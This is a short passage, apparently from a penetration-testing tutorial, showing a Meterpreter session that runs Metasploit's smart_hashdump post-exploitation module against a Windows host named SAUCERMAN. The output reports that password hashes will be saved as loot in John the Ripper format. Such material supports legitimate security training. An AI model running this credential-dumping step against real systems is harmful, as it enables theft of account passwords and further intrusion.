As the warning above shows, the framework recommends post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file